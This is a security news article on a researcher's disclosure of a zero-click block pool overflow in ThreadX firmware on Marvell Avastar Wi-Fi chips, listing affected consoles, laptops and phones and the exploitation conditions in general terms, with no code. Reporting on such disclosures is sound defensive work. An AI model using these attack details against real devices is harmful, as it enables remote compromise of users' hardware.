Several vulnerabilities have been discovered in the firmware of a Wi-Fi chipset, meaning that a variety of laptop and smart devices are affected. The exploit can happen without user interaction, claims Embedi researcher Denis Selianin.
With this research, I’m going to answer the question that has had to be answered for quite a time: to what extent is Marvell WiFi FullMAC SoC (not) secure. Since the wireless devices with the analyzed chip aren’t fully researched by the community yet, they may contain a tremendous volume of unaudited code, which may result in severe security issues swarming devices equipped with WLAN cards, Selianin explained in his report.
The vulnerabilities reside in ThreadX, which is a real-time operating system (RTOS), developed by Express Logic. Apparently, ThreadX has over 6.2 billion deployments, making it one of the most popular software products in Wi-Fi chips.
The firmware is also found in the Avastar 88W8897 SoC (Wi-Fi + Bluetooth + NFC) from Marvell, located in Sony PlayStation 4 (and its Pro variant), Microsoft Surface (+Pro) tablet and laptop, Xbox One, Samsung Chromebook and smartphones (Galaxy J1), and Valve SteamLink.
A Block Pool Overflow Vulnerability
In fact, the researcher came across several vulnerabilities in the ThreadX proprietary firmware. The most notable one is a block pool overflow that can be triggered without user interaction while the affected device scans for available networks. It is noteworthy that this scan is launched every 5 minutes regardless of the fact whether the device is connected to a Wi-Fi network or not. This opens the door for exploit with “zero-click interaction at any state of wireless connection,” the researcher said.
So, the vulnerability:
- doesn’t require any user interaction;
- can be triggered every 5 minutes in case of GNU/Linux operating system;
- doesn’t require the knowledge of a Wi-Fi network name or passphrase/key;
- can be triggered even when a device isn’t connected to any Wi-Fi network, just powered on.
According to the findings, this vulnerability is exploitable in the original ThreadX firmware and the Marvell Avastar Wi-Fi SoC. Selianin also provided a demonstration of the attack where the exploit is chained with an escalation of privilege bug to execute code on the application processor of SteamLink, a desktop streaming device utilizing Marvell Avastar Wi-Fi SoC.
All in all, there are two techniques to exploit ThreadX block pool overflow. One of them is generic and can be applied to any ThreadX-based firmware, with the condition that it has a block pool overflow bug, and the next block is free. The second technique is specific to the implementation of Marvell Wi-Fi firmware and works if the next block is busy.
In other words, by combining them together a reliable exploitation can be achieved, the researcher noted. Here’s the full technical disclosure of the vulnerability.